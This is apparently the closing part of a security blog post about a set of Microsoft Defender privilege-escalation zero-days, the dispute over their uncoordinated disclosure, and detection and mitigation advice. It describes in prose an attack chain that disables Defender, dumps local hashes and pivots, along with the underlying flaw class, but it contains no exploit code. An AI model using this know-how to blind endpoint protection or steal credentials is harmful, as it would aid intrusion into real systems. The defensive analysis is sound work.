Against the researcher: Dropping a zero-day hours after Patch Tuesday, with no disclosure period, no MSRC engagement, and a working exploit — that is not responsible disclosure by any definition. RoguePlanet is currently exploitable against fully patched systems. Real enterprises are exposed. The researcher’s frustration with MSRC may be legitimate, but the response is disproportionate to the grievance. Weaponized protest disclosure puts real people at risk.
My position: Both things are true simultaneously. Microsoft’s DMCA strategy against vulnerability research is legally aggressive, ethically questionable, and strategically counterproductive — it drives researchers toward anonymous full-drop disclosure rather than toward cooperation. And dropping unpatched zero-days as a public statement, regardless of the provocation, is reckless. The answer to a broken disclosure process is not to abandon disclosure entirely. It is to fix the process — and that requires pressure from the community, from CISA, and from enterprise customers who are tired of being collateral damage in these disputes.
The chilling effect is real and measurable. Multiple Windows internals researchers I track have gone quiet since the takedowns. Fewer kernel-mode PoCs are being published. Fewer vulnerability write-ups are appearing on English-language blogs. That silence does not make Windows more secure. It makes it less auditable.
Key Takeaways
- One architectural flaw, four exploits. Defender’s SYSTEM-context file I/O on user-controllable paths, combined with missing reparse-point validation, is a systemic design issue — not four isolated bugs. Until Microsoft addresses the model (handle-based I/O, caller impersonation, reparse-point validation at every privileged call site), new variants will continue to emerge.
- The chain is the weapon. UnDefend + BlueHammer was observed in the wild: blind the endpoint, dump the local hashes, pivot from there. Any individual primitive is dangerous; combined, they are a complete intrusion toolkit.
- RoguePlanet is unpatched. Disable the WER QueueReporting task as a stopgap. Monitor for junction creation in temp directories, unexpected wermgr.exe child processes, and Cloud Files API calls from non-cloud processes. Patch when Microsoft ships one.
- Detection is possible for all four primitives if you instrument the right surfaces: Microsoft-Windows-CldFlt ETW for Cloud Files abuse, Microsoft-Windows-Kernel-File for oplock anomalies, Sysmon Events 7/11/17/18/23 for the filesystem and pipe indicators. The Sigma rules above are starting points; tune them to your baseline.
- The disclosure controversy has no clean heroes. Microsoft’s DMCA overreach is chilling legitimate research. The researcher’s uncoordinated zero-day drops are endangering enterprises. Both behaviors make the ecosystem less safe. Advocate loudly for MSRC process reform. Do not confuse that advocacy with endorsement of weaponized protest disclosure.
References
- CVE-2026-33825 (BlueHammer) – Microsoft Defender Elevation of Privilege Vulnerability | MSRC Security Update Guide
- Microsoft warns of new Defender zero-days (RedSun / UnDefend) exploited in attacks | BleepingComputer
- Microsoft Defender ‘RoguePlanet’ zero-day grants SYSTEM privileges | BleepingComputer
- BlueHammer: Inside the Windows Zero-Day (Technical Deep-Dive) | Cyderes Howler Cell
- Microsoft Condemns Uncoordinated Zero-Day Disclosures – Nightmare Eclipse Saga Analysis | The CyberSignal
- MITRE ATT&CK – Impair Defenses: Disable or Modify Tools (T1562.001)